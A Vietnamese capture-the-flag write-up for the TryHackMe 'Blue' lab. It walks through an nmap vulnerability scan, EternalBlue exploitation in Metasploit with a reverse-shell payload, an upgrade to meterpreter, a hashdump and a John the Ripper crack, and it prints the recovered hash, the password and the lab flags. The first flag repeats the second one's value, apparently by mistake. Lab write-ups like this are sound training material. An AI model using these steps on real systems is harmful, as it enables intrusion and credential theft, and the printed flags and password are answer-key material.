Blue

Recon

Chạy câu lệnh Nmap sau:

sudo nmap -sV -vv --script vuln TARGET_IP

Giải thích:

• Bởi vì target machine không phản hồi ICMP nên ta không thể dùng các loại scan bằng ping thông thường.
• Ngoài ra, trong câu lệnh trên còn sử dụng script vuln để dò các lỗ hổng của target machine.
• Có thể thời gian quét lâu mà ta muốn thấy progress nên dùng thêm option -vv.

Sau khi quét thì phát hiện lỗ hổng ms17-010.

Gain Access

Tìm kiếm trong Metasploit với từ khóa là ms17-010. Ta có được module:

exploit/windows/smb/ms17_010_eternalblue

Sử dụng module này và set option RHOSTS là IP của target machine.

Sau đó sử dụng thêm payload sau để tạo reverse shell:

set payload windows/x64/shell/reverse_tcp

Sau khi khai thác thì ta có được một session. Dùng tổ hợp phím CTRL + Z để chuyển nó về background.

Escalate

Để nâng cấp từ reverse shell thông thường lên meterpreter thì ta cần dùng module sau:

post/multi/manage/shell_to_meterpreter

Sau đó set option SESSION thành id của session vừa tạo ở phase trước và chạy module này. Nếu thành công ta sẽ nhận được một meterpreter session mới.

Note

Chúng ta cũng có thể chạy lệnh sessions -u id với id là chỉ số của shell cần upgrade thành meterpreter.

Chạy các câu lệnh sau để explore target machine:

• whoami. Output mong muốn nhận được: NT AUTHORITY\SYSTEM.
• ps. Output mong muốn nhận được: danh sách tiến trình.

Cracking

Sau khi có meterpreter thì dùng lệnh hashdump để xem password ở dạng hash của các user. Thấy được password của Jon như sau:

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Lưu chuỗi này vào file jon.hash.

Dùng John để crack, câu lệnh:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt jon.hash

Thu được password của Jon là:

alqfna22

Challenge

Flag 1

Truy cập vào ổ C và ta thấy flag ở trong file flag1.txt:

Success

flag{sam_database_elevated_access}

Flag 2

Password thường được lưu ở C:/Windows/System32/config. Truy cập vào và thấy flag ở trong file flag2.txt:

Success

flag{sam_database_elevated_access}

Flag 3

Tìm kiếm file flag3.txt bằng câu lệnh sau:

dir "flag3.txt" /s

Tìm được file ở thư mục C:\Users\Jon\Documents. Truy cập vào và ta tìm được flag:

Success

flag{admin_documents_can_be_valuable}

Resources

• https://tryhackme.com/room/blue
• https://infosecwriteups.com/tryhackme-relevant-ctf-write-up-7705501b73dd
• https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/